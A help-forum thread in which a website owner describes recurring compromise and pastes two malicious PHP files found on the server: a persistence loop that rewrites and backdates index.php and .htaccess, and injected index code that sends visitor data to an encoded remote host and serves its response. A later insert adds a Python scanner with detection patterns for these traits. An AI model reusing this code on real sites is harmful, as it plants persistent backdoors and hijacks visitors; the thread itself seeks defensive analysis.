Hack website
Author: A. Pais
For about 4 months now, I have been hacked every week.
I have already tried deleting the whole folder and deleting the altered files, and every time I upload the clean files, after a few days the same thing happens.
I think there is a vulnerability in some file through which the hacker manages to access the space. Can you help if I send you the files for analysis?
I am frustrated and have already gone back to the old program (website x5 evo12), since it was always secure.
Can you help me?
What exactly do you mean by “hacked”?
The only vulnerabilities might be in the php files if you use a deprecated version of php, but the chances are very low.
I think that:
- either you have extra code from a dubious source (counters, for example).
- or they have your ftp password.
Anyway, version 12 is more vulnerable.
Have you changed the ftp password yet?
Do you have extra codes?
Do you use ftps to transfer the site to the host?
Explain well what you mean by “hacked”.
Looks like you are using MyBB for your forums. You might see if they have an upgrade. Your hosting provider should offer the ability to block IPs. Most likely they are coming from a short list of IPs.
Author
Yes, I use MyBB, but I think it is not there. Yesterday I deactivated the plugins, and it is the same. Every time I delete these 3 files, after some time they reappear, and my index is put with ".old", like in the print. I can share the files; they don't have a virus, but someone can see what they mess with.
Have you reset and changed the ftp password?
What version of MyBB?
What version of php?
Author
I reset the ftp pass, like 5 times.
My version of MyBB is the last, 1.38.
The php version I can see in cpanel is 7.3 (current).
You should upgrade your PHP to 8.1. My hosting does not even support PHP v7.x anymore.
Author
I will consider it in the next update of MyBB, but I think it is not from there.
This is the code that appears:
I.php
<?php unlink('/home/ptumcom/public_html/l.php');$index_path = '/tmp' ."/index.php";
$index_content = file_get_contents($index_path);
$index_md5 = md5($index_content);
$htaccess_path = '/tmp' ."/.htaccess";
$htaccess_content = file_get_contents($htaccess_path);
$htaccess_md5 = md5($htaccess_content);
while (true)
{
$temp_md5 = @md5(file_get_contents($index_path));
if (!file_exists($index_path) || $temp_md5 != $index_md5) {
@file_put_contents($index_path, $index_content);
@touch($index_path, strtotime("-400 days", time()));
@chmod($index_path, 0444);
}
$temp_md5 = @md5(file_get_contents($htaccess_path));
if (!file_exists($htaccess_path) || $temp_md5 != $htaccess_md5) {
@file_put_contents($htaccess_path, $htaccess_content);
@touch($htaccess_path, strtotime("-400 days", time()));
@chmod($htaccess_path, 0444);
}
sleep(1);
}"
and in new index.php
This is the change
"function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } function h2() { if (file_exists('robots'.'.txt')){ @unlink('robots'.'.txt'); } $htaccess = '.'.'htaccess'; $content = @base64_decode("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"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 0777); @file_put_contents($htaccess, $content); @chmod($htaccess, 0644); } $api = base64_decode('aHR0cDovLzYwMTItY2g0LXYyNjYuaW1nMTB5YWhvby5jb20='); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://' $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? 
$_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} h2(); $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>
<!DOCTYPE html><!-- HTML5 -->"
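Added example (not part of the original thread or any poster's code): a Python triage scanner for the traits visible in the two samples quoted above, namely the rewrite loop, the backdated touch(), the base64-encoded URL and the packed response, plus read-only files whose mtime is far older than their ctime. The function names, the 300-day gap and the 2 MB read limit are assumptions, and a match is a hint for manual review, not proof.

```python
import os
import re
import tempfile
import time

# Patterns taken from the two samples quoted in this thread: triage hints, not proof.
INDICATORS = {name: re.compile(rx, re.S | re.I) for name, rx in {
    "watchdog-loop": rb"while\s*\(\s*true\s*\).{0,2000}?file_put_contents.{0,2000}?sleep\s*\(",
    "backdated-touch": rb"touch\s*\([^;]*strtotime\s*\(\s*[\"']-\d+\s+days",
    "encoded-remote-url": rb"base64_decode\s*\(\s*[\"']aHR0c",  # base64 of "http"
    "packed-response": rb"gzuncompress\s*\(\s*base64_decode",
}.items()}
# Constructed, inert text modelled on the first sample (sample input, not a working script).
CONSTRUCTED_SAMPLE = (b'<?php while (true) { @file_put_contents($p, $c); '
                      b'@touch($p, strtotime("-400 days", time())); sleep(1); }')

def scan_file(path, gap_days=300):
    """Return the names of the indicators that one file matches."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        data = fh.read(2_000_000)
    found = [name for name, rx in INDICATORS.items() if rx.search(data)]
    # touch() can backdate mtime but not ctime: old mtime, recent ctime and mode 0444.
    if st.st_ctime - st.st_mtime > gap_days * 86400 and (st.st_mode & 0o777) == 0o444:
        found.append("backdated-readonly")
    return found

def scan_tree(root):
    """Map each flagged file under root to its findings; unreadable files are skipped."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for path in (os.path.join(dirpath, n) for n in files):
            try:
                report[path] = scan_file(path)
            except OSError:
                continue
    return {p: f for p, f in report.items() if f}

def demo():
    """Scan a throwaway directory holding the constructed sample, backdated 400 days."""
    path = os.path.join(tempfile.mkdtemp(), "sample.php")
    with open(path, "wb") as fh:
        fh.write(CONSTRUCTED_SAMPLE)
    os.utime(path, (time.time() - 400 * 86400,) * 2)  # backdate atime and mtime
    os.chmod(path, 0o444)
    return scan_tree(os.path.dirname(path))[path]

if __name__ == "__main__":
    print(demo())
```

Files uploaded from an archive can also carry an mtime older than their ctime, which is why the timestamp check only fires together with mode 0444.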
Author
OK, I think I figured out the problem.
I did a search on the file I.php and got some results relating to Facebook. I have a code and a plugin in my index, so I removed them. Let's see if they appear again. Hope not ;)
Friend, the problem is on your server. If it is a single account, the FTP may have been broken into and some malicious code planted. Most of the time it gets broken into because it is shared hosting! Hold the company responsible for your hosting to account!
Author
The problem is not the Facebook plugin. I will try to make a fresh MyBB install and see if the problem remains.
I will give news.